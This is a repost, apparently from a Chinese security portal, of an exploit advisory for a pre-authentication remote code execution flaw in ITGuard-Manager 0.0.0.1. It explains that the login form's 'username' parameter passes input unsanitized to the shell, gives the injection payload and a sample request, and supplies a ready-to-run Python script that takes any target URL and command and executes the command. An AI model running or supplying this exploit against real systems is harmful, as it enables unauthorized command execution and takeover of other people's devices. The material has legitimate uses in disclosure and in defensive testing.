首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ITGuard-Manager 0.0.0.1 - Remote Code Execution
来源:wassline@gmail.com 作者:Asrir 发布时间:2017-12-18  
# Vulnerability Title:  ITGuard-Manager V0.0.0.1 PreAuth Remote Code Execution
# Author: Nassim Asrir
# Contact: wassline@gmail.com / @asrir_nassim
# CVE: Waiting ...
# CVSS: CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H/E:H/MAV:P 
# Vendor:  http://www.innotube.com
 
 
Details:
========
 
First we need to know what happens when we need to LogIn.
When the User or Attacker insert any strings in the login form he/she will get this POST request:
 
POST /cgi-bin/drknow.cgi?req=login HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://server/log-in.html?lang=KOR
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Connection: close
Upgrade-Insecure-Requests: 1
 
req=login&lang=KOR&username=admin&password=admin
 
 
Ok now we have this POST request and all we care about is the ‘username’ parameter . and we
can execute our system commands via this parameter due to missing input sanitization.
The payload will be: 'admin|'command'||x we will change the command by any *unix command (ls – id – mkdir ….)
 
Exploit:
=======
 
#i am not responsible for any wrong use.
 
import requests
target = raw_input('Target(With proto) : ')
command = raw_input('Command To Execute : ')
fullpath=target +"/cgi-bin/drknow.cgi?req=login"
data = {'req':'login',
        'lang':'ENG',
        'username':'admin|'+command+'||x',
        'password':'admin'}
 
execute = requests.post(fullpath, data = data)
 
print execute.text
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Western Digital MyCloud multi_
·Sync Breeze 10.2.12 - Denial o
·Microsoft Office DDE Payload D
·Linux kernel < 4.10.15 - Race
·Dup Scout Enterprise 10.0.18 B
·CDex 1.96 - Buffer Overflow
·Advantech WebAccess 8.2 Stack
·Outlook for Android - Attachme
·pfSense 2.4.1 CSRF Error Page
·GoAhead httpd 2.5 < 3.6.5 - 'L
·glibc ld.so - Memory Leak / Bu
·Linksys WVBR0 - 'User-Agent' R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved